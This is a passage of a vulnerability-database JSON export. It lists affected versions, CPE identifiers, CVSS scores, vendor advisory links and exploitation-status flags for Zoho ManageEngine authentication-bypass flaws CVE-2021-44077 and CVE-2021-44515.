"cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10521:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11143:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10519:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11003:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11207:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11302:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10508:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10526:*:*:*:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus msp"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus msp"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus msp"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus msp"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus msp"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus msp"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus msp"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus msp"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus msp"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus msp"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus msp"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus msp"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus msp"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus msp"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus msp"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus msp"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus msp"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus msp"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus msp"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus msp"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus msp"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus msp"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus msp"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus msp"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus msp"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus msp"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus msp"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus msp"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus msp"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus msp"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "version": "10.5", "operator": "le", "name": "zohocorp manageengine servicedesk plus msp"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "version": "11.0", "operator": "eq", "name": "zohocorp manageengine supportcenter plus"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "version": "11.0", "operator": "eq", "name": "zohocorp manageengine supportcenter plus"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "version": "11.0", "operator": "eq", "name": "zohocorp manageengine supportcenter plus"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "version": "11.0", "operator": "eq", "name": "zohocorp manageengine supportcenter plus"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "version": "11.0", "operator": "eq", "name": "zohocorp manageengine supportcenter plus"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "version": "11.0", "operator": "eq", "name": "zohocorp manageengine supportcenter plus"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "version": "11.0", "operator": "eq", "name": "zohocorp manageengine supportcenter plus"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "version": "11.0", "operator": "eq", "name": "zohocorp manageengine supportcenter plus"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "version": "11.0", "operator": "eq", "name": "zohocorp manageengine supportcenter plus"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "version": "11.0", "operator": "eq", "name": "zohocorp manageengine supportcenter plus"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "version": "11.0", "operator": "eq", "name": "zohocorp manageengine supportcenter plus"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "version": "11.0", "operator": "eq", "name": "zohocorp manageengine supportcenter plus"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "version": "11.0", "operator": "eq", "name": "zohocorp manageengine supportcenter plus"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "version": "11.0", "operator": "eq", "name": "zohocorp manageengine supportcenter plus"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "version": "11.0", "operator": "le", "name": "zohocorp manageengine supportcenter plus"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11138:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11139:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11140:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11141:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11142:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11143:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11144:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11145:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11200:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11201:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11202:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11203:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11204:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11205:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11206:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11207:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11208:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11209:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11210:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11211:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11300:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11301:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11302:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11303:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11304:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11305:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10500:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10501:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10502:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10503:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10504:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10505:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10506:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10507:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10508:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10509:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10510:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10511:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10512:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10513:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10514:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10515:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10516:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10517:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10518:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10519:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10520:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10521:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10522:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10523:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10524:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10525:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10526:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10527:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10528:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10529:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:*:*:*:*:*:*:*", "versionEndIncluding": "10.5", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11000:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11001:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11002:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11003:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11004:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11005:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11006:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11007:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11008:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11009:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11010:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11011:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11012:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11013:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:*:*:*:*:*:*:*", "versionEndIncluding": "11.0", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021", "name": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021", "refsource": "MISC", "tags": ["Vendor Advisory"]}, {"url": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above", "name": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-msp-versions-10527-till-10529", "name": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-msp-versions-10527-till-10529", "refsource": "MISC", "tags": ["Vendor Advisory"]}, {"url": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-supportcenter-plus-versions-11012-and-11013", "name": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-supportcenter-plus-versions-11012-and-11013", "refsource": "MISC", "tags": ["Vendor Advisory"]}, {"url": "http://packetstormsecurity.com/files/165400/ManageEngine-ServiceDesk-Plus-Remote-Code-Execution.html", "name": "http://packetstormsecurity.com/files/165400/ManageEngine-ServiceDesk-Plus-Remote-Code-Execution.html", "refsource": "MISC", "tags": []}], "_object_type": "robots.models.cve.CveBulletin", "_object_types": ["robots.models.cve.CveBulletin", "robots.models.base.Bulletin"]}], "attackerkb": [{"id": "AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12", "vendorId": null, "hash": "00cadbc1160e0294aa52e38be41b743a", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.\n\n \n**Recent assessments:** \n \n**wvu-r7** at January 14, 2022 9:36am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515/rapid7-analysis>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "published": "2022-01-15T00:00:00", "modified": "2022-01-15T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44515", "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2022-01-15T05:29:21", "history": [{"bulletin": {"id": "AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12", "vendorId": null, "hash": "9f445e395f6cf9ba27079a528cee38ea", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "published": "2021-12-13T00:00:00", "modified": "2021-12-13T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44515", "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-13T16:42:55", "history": [], "viewCount": 13, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-44515"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-13T16:42:55", "rev": 2}, "score": {"value": 5.4, "vector": "NONE", "modified": "2021-12-13T16:42:55", "rev": 2}}, "objectVersion": "1.6", "attackerkb": {"attackerValue": 0, "exploitability": 0}, "wildExploited": true, "wildExploitedCategory": {"Government or Industry Alert": ""}, "wildExploitedReports": [{"category": "Government or Industry Alert", "source_url": 